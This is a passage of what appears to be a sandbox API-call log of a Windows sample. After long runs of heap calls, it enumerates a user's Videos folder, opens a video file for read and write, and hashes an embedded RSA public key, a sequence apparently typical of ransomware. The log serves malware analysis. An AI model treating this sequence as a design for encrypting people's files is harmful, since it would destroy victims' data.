hHeap=0xcd0000) returned 1 [0172.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.662] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.662] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.662] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.662] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.662] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.662] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.662] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.662] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.662] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.662] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.662] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.662] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.662] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.662] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.662] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.662] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.662] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.662] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.662] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.662] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.662] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.662] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.662] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.662] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.662] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.662] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.662] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.663] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.663] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.663] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.663] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.663] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.663] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.663] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.663] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.663] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.663] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.663] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.663] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.663] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.663] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee98 | out: hHeap=0xcd0000) returned 1 [0172.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.666] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\") returned="Uzo_bgWg\\" [0172.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2d68 [0172.666] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\") returned="V4xTSO7L1q6Ip\\" [0172.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0172.667] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0172.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57528 [0172.667] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0172.667] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.667] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.667] PathFindFileNameW (pszPath="") returned="" [0172.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0172.667] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9a707fa0, ftCreationTime.dwHighDateTime=0x1d5dbc2, ftLastAccessTime.dwLowDateTime=0x515a1b80, ftLastAccessTime.dwHighDateTime=0x1d5e5ec, ftLastWriteTime.dwLowDateTime=0x515a1b80, ftLastWriteTime.dwHighDateTime=0x1d5e5ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.667] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\1Jhy.flv") returned=".flv" [0172.667] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\1Jhy.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\1jhy.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.668] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=97232) returned 1 [0172.668] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.671] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x17baa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.671] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.672] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x17bd0, lpOverlapped=0x0) returned 1 [0172.673] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.673] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.673] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.673] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ee98) returned 1 [0172.675] CryptCreateHash (in: hProv=0xd2ee98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.675] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.675] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.675] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.675] GetLastError () returned 0x0 [0172.675] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.675] CryptReleaseContext (hProv=0xd2ee98, dwFlags=0x0) returned 1 [0172.675] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.675] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 